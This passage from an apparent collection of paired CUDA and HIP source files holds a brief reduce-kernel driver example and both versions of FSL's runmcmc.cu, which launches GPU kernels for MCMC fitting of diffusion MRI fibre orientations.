    cudaDeviceSynchronize();
    cudaFree(dIn);
    cudaFree(dOut);
    return 0;
}
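The reduce kernel in this pair writes one partial sum per block into outData, so reducing a larger array still needs a final pass. A hypothetical multi-block driver is sketched below, assuming the element count is a multiple of BLOCK_SIZE (the kernel's halving loop also assumes a power-of-two block size) and finishing the reduction on the host; the function name and buffer names are illustrative.

// Hypothetical multi-block driver for the reduce kernel above; names and sizes are illustrative.
#include <vector>
#include <numeric>

int reduceOnDevice(const int* hIn, int N) {   // N assumed to be a multiple of BLOCK_SIZE
    const int blocks = N / BLOCK_SIZE;
    int *dIn = NULL, *dOut = NULL;
    cudaMalloc((void**)&dIn, N * sizeof(int));
    cudaMalloc((void**)&dOut, blocks * sizeof(int));
    cudaMemcpy(dIn, hIn, N * sizeof(int), cudaMemcpyHostToDevice);

    reduce<<<blocks, BLOCK_SIZE>>>(dIn, dOut);        // one partial sum per block

    std::vector<int> partial(blocks);
    cudaMemcpy(partial.data(), dOut, blocks * sizeof(int), cudaMemcpyDeviceToHost);
    cudaFree(dIn);
    cudaFree(dOut);
    return std::accumulate(partial.begin(), partial.end(), 0);  // final pass on the host
}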
14d16088f662e62e322ab6ff4a54f0a15bb6e072.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* runmcmc.cu Tim Behrens, Saad Jbabdi, Stam Sotiropoulos, Moises Hernandez - FMRIB Image Analysis Group Copyright (C) 2005 University of Oxford */ /* Part of FSL - FMRIB's Software Library http://www.fmrib.ox.ac.uk/fsl [email protected] Developed at FMRIB (Oxford Centre for Functional Magnetic Resonance Imaging of the Brain), Department of Clinical Neurology, Oxford University, Oxford, UK LICENCE FMRIB Software Library, Release 5.0 (c) 2012, The University of Oxford (the "Software") The Software remains the property of the University of Oxford ("the University"). The Software is distributed "AS IS" under this Licence solely for non-commercial use in the hope that it will be useful, but in order that the University as a charitable foundation protects its assets for the benefit of its educational and research purposes, the University makes clear that no condition is made or to be implied, nor is any warranty given or to be implied, as to the accuracy of the Software, or that it will be suitable for any particular purpose or for use under any specific conditions. Furthermore, the University disclaims all responsibility for the use which is made of the Software. It further disclaims any liability for the outcomes arising from using the Software. The Licensee agrees to indemnify the University and hold the University harmless from and against any and all claims, damages and liabilities asserted by third parties (including claims for negligence) which arise directly or indirectly from the use of the Software or the sale of any products based on the Software. No part of the Software may be reproduced, modified, transmitted or transferred in any form or by any means, electronic or mechanical, without the express permission of the University. The permission of the University is not required if the said reproduction, modification, transmission or transference is done without financial return, the conditions of this Licence are imposed upon the receiver of the product, and all original and amended source code is included in any transmitted product. You may be held legally responsible for any copyright infringement that is caused or encouraged by your failure to abide by these terms and conditions. You are not permitted under this Licence to use this Software commercially. Use for which any financial return is received shall be defined as commercial use, and includes (1) integration of all or part of the source code or the Software into a product for sale or license by or on behalf of Licensee to third parties or (2) use of the Software or any derivative of it for research with the final aim of developing software products for sale or license to a third party or (3) use of the Software or any derivative of it for research with the final aim of developing non-software products for sale or license to a third party, or (4) use of the Software to provide any service to an external organisation for which payment is received. If you are interested in using the Software commercially, please contact Oxford University Innovation ("OUI"), the technology transfer company of the University, to negotiate a licence. Contact details are: [email protected] quoting reference DE/9564. 
*/ #include "xfibresoptions.h" #include <hiprand/hiprand.h> #include "runmcmc_kernels.hip" #include "sync_check.h" #include <host_vector.h> #include <device_vector.h> #include <time.h> #include <sys/time.h> #include "init_gpu.h" using namespace Xfibres; ////////////////////////////////////////////////////// // MCMC ON GPU ////////////////////////////////////////////////////// void init_Fibres_Multifibres( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& params_gpu, thrust::device_vector<float>& tau_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, const int ndirections, string output_file, double seed, //OUTPUT thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, thrust::device_vector<hiprandState_t>& randStates_gpu) { std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "----- MCMC ALGORITHM PART INITIALITATION ON GPU ----- " << "\n"; struct timeval t1,t2; double time; gettimeofday(&t1,NULL); int nvox = multifibres_gpu.size(); xfibresOptions& opts = xfibresOptions::getInstance(); int nfib= opts.nfibres.value(); int nparams_fit = 2+3*opts.nfibres.value(); if(opts.modelnum.value()>=2) nparams_fit++; if(opts.f0.value()) nparams_fit++; thrust::device_vector<double> angtmp_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); bool gradnonlin = opts.grad_file.set(); int blocks = nvox/VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; dim3 Dim_Grid_MCMC(blocks, 1); dim3 Dim_Block_MCMC(nthreads_block ,1); ///dimensions for MCMC float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *params_ptr = thrust::raw_pointer_cast(params_gpu.data()); float *tau_ptr = thrust::raw_pointer_cast(tau_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); hiprandState_t *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (3*nfib + 9)*sizeof(float) + sizeof(int)); myfile << "Shared Memory Used in init_Fibres_Multifibres: " << amount_shared << "\n"; hipLaunchKernelGGL(( init_Fibres_Multifibres_kernel), dim3(Dim_Grid_MCMC), dim3(Dim_Block_MCMC), amount_shared, 0, datam_ptr, params_ptr, tau_ptr, bvals_ptr, alpha_ptr, beta_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams_fit, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.rician.value(), opts.ardf0.value(), opts.all_ard.value(), opts.no_ard.value(), gradnonlin, angtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr); sync_check("init_Fibres_Multifibres_kernel"); // Initialise Randoms int total_threads= nvox; int blocks_Rand = total_threads/THREADS_BLOCK_RAND; if(total_threads%THREADS_BLOCK_RAND) blocks_Rand++; dim3 
Dim_Grid_Rand(blocks_Rand,1); dim3 Dim_Block_Rand(THREADS_BLOCK_RAND,1); hipLaunchKernelGGL(( setup_randoms_kernel) , dim3(Dim_Grid_Rand),dim3(Dim_Block_Rand), 0, 0, randStates_ptr,seed,nvox); sync_check("Setup_Randoms_kernel"); gettimeofday(&t2,NULL); time=timeval_diff(&t2,&t1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n\n" ; myfile.close(); } void runmcmc_burnin( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, const int ndirections, string output_file, //INPUT-OUTPUT thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, thrust::device_vector<hiprandState_t>& randStates_gpu) { xfibresOptions& opts = xfibresOptions::getInstance(); std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "--------- MCMC ALGORITHM PART BURNIN ON GPU --------- " << "\n"; struct timeval t_tot1,t_tot2; double time; time=0; gettimeofday(&t_tot1,NULL); int nvox = multifibres_gpu.size(); int nfib= opts.nfibres.value(); int nparams; bool gradnonlin=opts.grad_file.set(); if(opts.f0.value()) nparams=3+nfib*3; else nparams=2+nfib*3; if(opts.modelnum.value()>=2) nparams++; if(opts.modelnum.value()==3) nparams++; if(opts.rician.value()) nparams++; thrust::device_vector<float> recors_null_gpu; recors_null_gpu.resize(1); thrust::device_vector<double> angtmp_gpu; thrust::device_vector<double> oldangtmp_gpu; thrust::device_vector<double> oldsignals_gpu; thrust::device_vector<double> oldisosignals_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); oldangtmp_gpu.resize(nvox*ndirections); oldsignals_gpu.resize(nvox*ndirections*nfib); oldisosignals_gpu.resize(nvox*ndirections); myfile << "Processing " << nvox << " voxels \n"; int blocks = nvox/VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; dim3 Dim_Grid(blocks, 1); dim3 Dim_Block(nthreads_block,1); //dimensions for MCMC myfile << "NUM BLOCKS: " << blocks << "\n"; myfile << "THREADS PER BLOCK : " << nthreads_block << "\n"; //get pointers float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); hiprandState_t *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); double *oldangtmp_ptr = thrust::raw_pointer_cast(oldangtmp_gpu.data()); double *oldsignals_ptr = thrust::raw_pointer_cast(oldsignals_gpu.data()); double *oldisosignals_ptr = thrust::raw_pointer_cast(oldisosignals_gpu.data()); float *records_null = thrust::raw_pointer_cast(recors_null_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (10*nfib + 27)*sizeof(float) + (7*nfib + 20)*sizeof(int)+ sizeof(hiprandState_t)); myfile << "Shared Memory Used in runmcmc_burnin: " << amount_shared << "\n"; if(nvox!=0){ 
hipLaunchKernelGGL(( runmcmc_kernel), dim3(Dim_Grid), dim3(Dim_Block), amount_shared , 0, datam_ptr, bvals_ptr, alpha_ptr, beta_ptr, randStates_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.ardf0.value(), !opts.no_ard.value(), opts.rician.value(), gradnonlin, opts.updateproposalevery.value(), opts.nburn.value(), 0, 0, 0, oldsignals_ptr, oldisosignals_ptr, angtmp_ptr, oldangtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr,records_null,records_null,records_null,records_null,records_null,records_null,records_null, records_null,records_null); sync_check("runmcmc_burnin_kernel"); } gettimeofday(&t_tot2,NULL); time=timeval_diff(&t_tot2,&t_tot1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n\n" ; myfile.close(); } void runmcmc_record( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, const int ndirections, thrust::device_vector<hiprandState_t>& randStates_gpu, string output_file, //OUTPUT thrust::device_vector<float>& rf0_gpu, thrust::device_vector<float>& rtau_gpu, thrust::device_vector<float>& rs0_gpu, thrust::device_vector<float>& rd_gpu, thrust::device_vector<float>& rdstd_gpu, thrust::device_vector<float>& rR_gpu, thrust::device_vector<float>& rth_gpu, thrust::device_vector<float>& rph_gpu, thrust::device_vector<float>& rf_gpu) { xfibresOptions& opts = xfibresOptions::getInstance(); std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "--------- MCMC ALGORITHM PART RECORD ON GPU --------- " << "\n"; struct timeval t_tot1,t_tot2; double time; time=0; gettimeofday(&t_tot1,NULL); int totalrecords = (opts.njumps.value()/opts.sampleevery.value()); int nvox = multifibres_gpu.size(); int nfib= opts.nfibres.value(); int nparams; bool gradnonlin=opts.grad_file.set(); if(opts.f0.value()) nparams=3+nfib*3; else nparams=2+nfib*3; if(opts.modelnum.value()>=2) nparams++; if(opts.modelnum.value()==3) nparams++; if(opts.rician.value()) nparams++; thrust::device_vector<double> angtmp_gpu; thrust::device_vector<double> oldangtmp_gpu; thrust::device_vector<double> oldsignals_gpu; thrust::device_vector<double> oldisosignals_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); oldangtmp_gpu.resize(nvox*ndirections); oldsignals_gpu.resize(nvox*ndirections*nfib); oldisosignals_gpu.resize(nvox*ndirections); myfile << "Processing " << nvox << " voxels \n"; int blocks = nvox/VOXELS_BLOCK_MCMC; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; dim3 Dim_Grid(blocks, 1); dim3 Dim_Block(nthreads_block,1); //dimensions for MCMC myfile << "NUM BLOCKS: " << blocks << "\n"; myfile << "THREADS PER BLOCK : " << nthreads_block << "\n"; //get pointers float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = 
thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); hiprandState_t *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); double *oldangtmp_ptr = thrust::raw_pointer_cast(oldangtmp_gpu.data()); double *oldsignals_ptr = thrust::raw_pointer_cast(oldsignals_gpu.data()); double *oldisosignals_ptr = thrust::raw_pointer_cast(oldisosignals_gpu.data()); float *rf0_ptr = thrust::raw_pointer_cast(rf0_gpu.data()); float *rtau_ptr = thrust::raw_pointer_cast(rtau_gpu.data()); float *rs0_ptr = thrust::raw_pointer_cast(rs0_gpu.data()); float *rd_ptr = thrust::raw_pointer_cast(rd_gpu.data()); float *rdstd_ptr = thrust::raw_pointer_cast(rdstd_gpu.data()); float *rR_ptr = thrust::raw_pointer_cast(rR_gpu.data()); float *rth_ptr = thrust::raw_pointer_cast(rth_gpu.data()); float *rph_ptr = thrust::raw_pointer_cast(rph_gpu.data()); float *rf_ptr = thrust::raw_pointer_cast(rf_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (10*nfib + 27)*sizeof(float) + (7*nfib + 20)*sizeof(int)+ sizeof(hiprandState_t)); myfile << "Shared Memory Used in runmcmc_record: " << amount_shared << "\n"; if(nvox!=0){ hipLaunchKernelGGL(( runmcmc_kernel), dim3(Dim_Grid), dim3(Dim_Block), amount_shared , 0, datam_ptr, bvals_ptr, alpha_ptr, beta_ptr, randStates_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.ardf0.value(), !opts.no_ard.value(), opts.rician.value(), gradnonlin, opts.updateproposalevery.value(), opts.njumps.value(), opts.nburn.value(), opts.sampleevery.value(), totalrecords, oldsignals_ptr, oldisosignals_ptr, angtmp_ptr, oldangtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr, rf0_ptr, rtau_ptr, rs0_ptr, rd_ptr, rdstd_ptr, rR_ptr, rth_ptr, rph_ptr, rf_ptr); sync_check("runmcmc_record_kernel"); } gettimeofday(&t_tot2,NULL); time=timeval_diff(&t_tot2,&t_tot1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n" ; myfile.close(); }
14d16088f662e62e322ab6ff4a54f0a15bb6e072.cu
/* runmcmc.cu Tim Behrens, Saad Jbabdi, Stam Sotiropoulos, Moises Hernandez - FMRIB Image Analysis Group Copyright (C) 2005 University of Oxford */ /* Part of FSL - FMRIB's Software Library http://www.fmrib.ox.ac.uk/fsl [email protected] Developed at FMRIB (Oxford Centre for Functional Magnetic Resonance Imaging of the Brain), Department of Clinical Neurology, Oxford University, Oxford, UK LICENCE FMRIB Software Library, Release 5.0 (c) 2012, The University of Oxford (the "Software") The Software remains the property of the University of Oxford ("the University"). The Software is distributed "AS IS" under this Licence solely for non-commercial use in the hope that it will be useful, but in order that the University as a charitable foundation protects its assets for the benefit of its educational and research purposes, the University makes clear that no condition is made or to be implied, nor is any warranty given or to be implied, as to the accuracy of the Software, or that it will be suitable for any particular purpose or for use under any specific conditions. Furthermore, the University disclaims all responsibility for the use which is made of the Software. It further disclaims any liability for the outcomes arising from using the Software. The Licensee agrees to indemnify the University and hold the University harmless from and against any and all claims, damages and liabilities asserted by third parties (including claims for negligence) which arise directly or indirectly from the use of the Software or the sale of any products based on the Software. No part of the Software may be reproduced, modified, transmitted or transferred in any form or by any means, electronic or mechanical, without the express permission of the University. The permission of the University is not required if the said reproduction, modification, transmission or transference is done without financial return, the conditions of this Licence are imposed upon the receiver of the product, and all original and amended source code is included in any transmitted product. You may be held legally responsible for any copyright infringement that is caused or encouraged by your failure to abide by these terms and conditions. You are not permitted under this Licence to use this Software commercially. Use for which any financial return is received shall be defined as commercial use, and includes (1) integration of all or part of the source code or the Software into a product for sale or license by or on behalf of Licensee to third parties or (2) use of the Software or any derivative of it for research with the final aim of developing software products for sale or license to a third party or (3) use of the Software or any derivative of it for research with the final aim of developing non-software products for sale or license to a third party, or (4) use of the Software to provide any service to an external organisation for which payment is received. If you are interested in using the Software commercially, please contact Oxford University Innovation ("OUI"), the technology transfer company of the University, to negotiate a licence. Contact details are: [email protected] quoting reference DE/9564. 
*/ #include "xfibresoptions.h" #include <curand.h> #include "runmcmc_kernels.cu" #include "sync_check.h" #include <host_vector.h> #include <device_vector.h> #include <time.h> #include <sys/time.h> #include "init_gpu.h" using namespace Xfibres; ////////////////////////////////////////////////////// // MCMC ON GPU ////////////////////////////////////////////////////// void init_Fibres_Multifibres( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& params_gpu, thrust::device_vector<float>& tau_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, const int ndirections, string output_file, double seed, //OUTPUT thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, thrust::device_vector<curandState>& randStates_gpu) { std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "----- MCMC ALGORITHM PART INITIALITATION ON GPU ----- " << "\n"; struct timeval t1,t2; double time; gettimeofday(&t1,NULL); int nvox = multifibres_gpu.size(); xfibresOptions& opts = xfibresOptions::getInstance(); int nfib= opts.nfibres.value(); int nparams_fit = 2+3*opts.nfibres.value(); if(opts.modelnum.value()>=2) nparams_fit++; if(opts.f0.value()) nparams_fit++; thrust::device_vector<double> angtmp_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); bool gradnonlin = opts.grad_file.set(); int blocks = nvox/VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; dim3 Dim_Grid_MCMC(blocks, 1); dim3 Dim_Block_MCMC(nthreads_block ,1); ///dimensions for MCMC float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *params_ptr = thrust::raw_pointer_cast(params_gpu.data()); float *tau_ptr = thrust::raw_pointer_cast(tau_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); curandState *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (3*nfib + 9)*sizeof(float) + sizeof(int)); myfile << "Shared Memory Used in init_Fibres_Multifibres: " << amount_shared << "\n"; init_Fibres_Multifibres_kernel<<< Dim_Grid_MCMC, Dim_Block_MCMC, amount_shared>>>(datam_ptr, params_ptr, tau_ptr, bvals_ptr, alpha_ptr, beta_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams_fit, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.rician.value(), opts.ardf0.value(), opts.all_ard.value(), opts.no_ard.value(), gradnonlin, angtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr); sync_check("init_Fibres_Multifibres_kernel"); // Initialise Randoms int total_threads= nvox; int blocks_Rand = total_threads/THREADS_BLOCK_RAND; if(total_threads%THREADS_BLOCK_RAND) blocks_Rand++; dim3 Dim_Grid_Rand(blocks_Rand,1); dim3 Dim_Block_Rand(THREADS_BLOCK_RAND,1); 
setup_randoms_kernel <<<Dim_Grid_Rand,Dim_Block_Rand>>>(randStates_ptr,seed,nvox); sync_check("Setup_Randoms_kernel"); gettimeofday(&t2,NULL); time=timeval_diff(&t2,&t1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n\n" ; myfile.close(); } void runmcmc_burnin( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, const int ndirections, string output_file, //INPUT-OUTPUT thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, thrust::device_vector<curandState>& randStates_gpu) { xfibresOptions& opts = xfibresOptions::getInstance(); std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "--------- MCMC ALGORITHM PART BURNIN ON GPU --------- " << "\n"; struct timeval t_tot1,t_tot2; double time; time=0; gettimeofday(&t_tot1,NULL); int nvox = multifibres_gpu.size(); int nfib= opts.nfibres.value(); int nparams; bool gradnonlin=opts.grad_file.set(); if(opts.f0.value()) nparams=3+nfib*3; else nparams=2+nfib*3; if(opts.modelnum.value()>=2) nparams++; if(opts.modelnum.value()==3) nparams++; if(opts.rician.value()) nparams++; thrust::device_vector<float> recors_null_gpu; recors_null_gpu.resize(1); thrust::device_vector<double> angtmp_gpu; thrust::device_vector<double> oldangtmp_gpu; thrust::device_vector<double> oldsignals_gpu; thrust::device_vector<double> oldisosignals_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); oldangtmp_gpu.resize(nvox*ndirections); oldsignals_gpu.resize(nvox*ndirections*nfib); oldisosignals_gpu.resize(nvox*ndirections); myfile << "Processing " << nvox << " voxels \n"; int blocks = nvox/VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; dim3 Dim_Grid(blocks, 1); dim3 Dim_Block(nthreads_block,1); //dimensions for MCMC myfile << "NUM BLOCKS: " << blocks << "\n"; myfile << "THREADS PER BLOCK : " << nthreads_block << "\n"; //get pointers float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); curandState *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); double *oldangtmp_ptr = thrust::raw_pointer_cast(oldangtmp_gpu.data()); double *oldsignals_ptr = thrust::raw_pointer_cast(oldsignals_gpu.data()); double *oldisosignals_ptr = thrust::raw_pointer_cast(oldisosignals_gpu.data()); float *records_null = thrust::raw_pointer_cast(recors_null_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (10*nfib + 27)*sizeof(float) + (7*nfib + 20)*sizeof(int)+ sizeof(curandState)); myfile << "Shared Memory Used in runmcmc_burnin: " << amount_shared << "\n"; if(nvox!=0){ runmcmc_kernel<<< Dim_Grid, Dim_Block, amount_shared >>>(datam_ptr, bvals_ptr, alpha_ptr, beta_ptr, randStates_ptr, 
opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.ardf0.value(), !opts.no_ard.value(), opts.rician.value(), gradnonlin, opts.updateproposalevery.value(), opts.nburn.value(), 0, 0, 0, oldsignals_ptr, oldisosignals_ptr, angtmp_ptr, oldangtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr,records_null,records_null,records_null,records_null,records_null,records_null,records_null, records_null,records_null); sync_check("runmcmc_burnin_kernel"); } gettimeofday(&t_tot2,NULL); time=timeval_diff(&t_tot2,&t_tot1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n\n" ; myfile.close(); } void runmcmc_record( //INPUT thrust::device_vector<float>& datam_gpu, thrust::device_vector<float>& bvals_gpu, thrust::device_vector<double>& alpha_gpu, thrust::device_vector<double>& beta_gpu, thrust::device_vector<FibreGPU>& fibres_gpu, thrust::device_vector<MultifibreGPU>& multifibres_gpu, thrust::device_vector<double>& signals_gpu, thrust::device_vector<double>& isosignals_gpu, const int ndirections, thrust::device_vector<curandState>& randStates_gpu, string output_file, //OUTPUT thrust::device_vector<float>& rf0_gpu, thrust::device_vector<float>& rtau_gpu, thrust::device_vector<float>& rs0_gpu, thrust::device_vector<float>& rd_gpu, thrust::device_vector<float>& rdstd_gpu, thrust::device_vector<float>& rR_gpu, thrust::device_vector<float>& rth_gpu, thrust::device_vector<float>& rph_gpu, thrust::device_vector<float>& rf_gpu) { xfibresOptions& opts = xfibresOptions::getInstance(); std::ofstream myfile; myfile.open (output_file.data(), ios::out | ios::app ); myfile << "--------- MCMC ALGORITHM PART RECORD ON GPU --------- " << "\n"; struct timeval t_tot1,t_tot2; double time; time=0; gettimeofday(&t_tot1,NULL); int totalrecords = (opts.njumps.value()/opts.sampleevery.value()); int nvox = multifibres_gpu.size(); int nfib= opts.nfibres.value(); int nparams; bool gradnonlin=opts.grad_file.set(); if(opts.f0.value()) nparams=3+nfib*3; else nparams=2+nfib*3; if(opts.modelnum.value()>=2) nparams++; if(opts.modelnum.value()==3) nparams++; if(opts.rician.value()) nparams++; thrust::device_vector<double> angtmp_gpu; thrust::device_vector<double> oldangtmp_gpu; thrust::device_vector<double> oldsignals_gpu; thrust::device_vector<double> oldisosignals_gpu; angtmp_gpu.resize(nvox*ndirections*nfib); oldangtmp_gpu.resize(nvox*ndirections); oldsignals_gpu.resize(nvox*ndirections*nfib); oldisosignals_gpu.resize(nvox*ndirections); myfile << "Processing " << nvox << " voxels \n"; int blocks = nvox/VOXELS_BLOCK_MCMC; int nthreads_block = THREADS_VOXEL_MCMC*VOXELS_BLOCK_MCMC; if(nvox%VOXELS_BLOCK_MCMC) blocks++; dim3 Dim_Grid(blocks, 1); dim3 Dim_Block(nthreads_block,1); //dimensions for MCMC myfile << "NUM BLOCKS: " << blocks << "\n"; myfile << "THREADS PER BLOCK : " << nthreads_block << "\n"; //get pointers float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = 
